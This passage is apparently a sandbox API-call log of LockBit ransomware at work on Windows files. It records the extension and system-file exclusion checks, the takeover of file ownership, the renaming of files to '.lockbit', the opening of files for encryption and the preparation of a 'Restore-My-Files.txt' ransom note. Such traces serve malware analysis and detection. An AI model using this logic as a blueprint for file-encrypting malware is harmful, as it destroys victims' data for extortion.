TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.246] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.246] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.246] CloseHandle (hObject=0x3c0) returned 1 [0096.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.246] free (_Block=0x3981cc0) [0096.246] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.lockbit")) returned 1 [0096.247] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0096.247] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.247] malloc (_Size=0x40068) returned 0x206b860 [0096.247] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=2462) returned 1 [0096.247] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0096.249] GetLastError () returned 0x3e5 [0096.249] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.249] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.249] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.249] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipscht.xml", cAlternateFileName="")) returned 1 [0096.250] lstrcmpiW (lpString1=".", lpString2="ipscht.xml") returned -1 [0096.250] lstrcmpiW (lpString1="..", lpString2="ipscht.xml") returned -1 [0096.250] PathFindExtensionW (pszPath="ipscht.xml") returned=".xml" [0096.250] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.250] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.251] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.252] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipscht.xml") returned 1 [0096.252] lstrcmpiW (lpString1="ntldr", lpString2="ipscht.xml") returned 1 [0096.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipscht.xml") returned 1 [0096.252] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipscht.xml") returned -1 [0096.252] lstrcmpiW (lpString1="autorun.inf", lpString2="ipscht.xml") returned -1 [0096.252] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.252] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml") returned=".xml" [0096.252] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.252] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.252] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.253] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.253] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.lockbit") returned 70 [0096.253] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.253] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.lockbit")) returned 0 [0096.265] GetLastError () returned 0x5 [0096.267] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.268] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.268] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.268] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.269] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.269] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3d4, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.270] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.270] NtQueryInformationFile (in: FileHandle=0x3d4, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.274] NtClose (Handle=0x3d4) returned 0x0 [0096.277] RtlFreeAnsiString (AnsiString="\\") [0096.277] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3d4) returned 1 [0096.277] malloc (_Size=0x200) returned 0x3981cc0 [0096.277] GetTokenInformation (in: TokenHandle=0x3d4, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.277] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.277] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.277] CloseHandle (hObject=0x3d4) returned 1 [0096.277] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.277] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.278] free (_Block=0x3981cc0) [0096.278] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.278] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.lockbit")) returned 1 [0096.278] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3d4 [0096.279] CreateIoCompletionPort (FileHandle=0x3d4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.279] malloc (_Size=0x40068) returned 0x3940048 [0096.279] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2436) returned 1 [0096.279] ReadFile (in: hFile=0x3d4, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0096.283] GetLastError () returned 0x3e5 [0096.283] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0096.283] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0096.283] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0096.283] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipscsy.xml", cAlternateFileName="")) returned 1 [0096.283] lstrcmpiW (lpString1=".", lpString2="ipscsy.xml") returned -1 [0096.283] lstrcmpiW (lpString1="..", lpString2="ipscsy.xml") returned -1 [0096.283] PathFindExtensionW (pszPath="ipscsy.xml") returned=".xml" [0096.284] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0096.284] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0096.285] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0096.285] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0096.285] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipscsy.xml") returned 1 [0096.285] lstrcmpiW (lpString1="ntldr", lpString2="ipscsy.xml") returned 1 [0096.285] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipscsy.xml") returned 1 [0096.285] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipscsy.xml") returned -1 [0096.286] lstrcmpiW (lpString1="autorun.inf", lpString2="ipscsy.xml") returned -1 [0096.286] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0096.286] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml") returned=".xml" [0096.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0096.286] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0096.286] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0096.287] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0096.287] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0096.287] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0096.287] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.lockbit") returned 70 [0096.287] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.287] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.lockbit")) returned 0 [0096.287] GetLastError () returned 0x5 [0096.287] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0096.288] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0096.288] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0096.288] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0096.288] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0096.288] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0096.289] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0096.289] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0096.293] NtClose (Handle=0x3c0) returned 0x0 [0096.294] RtlFreeAnsiString (AnsiString="\\") [0096.294] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0096.294] malloc (_Size=0x200) returned 0x3981cc0 [0096.294] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x3981cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3981cc0, ReturnLength=0x344cda0) returned 1 [0096.294] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.294] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3981cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0096.294] CloseHandle (hObject=0x3c0) returned 1 [0096.294] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0096.294] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0096.294] free (_Block=0x3981cc0) [0096.294] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0096.294] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.lockbit")) returned 1 [0096.295] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0096.295] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0096.295] malloc (_Size=0x40068) returned 0x206b860 [0096.295] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=2556) returned 1 [0096.295] ReadFile (in: hFile=0x3c0, 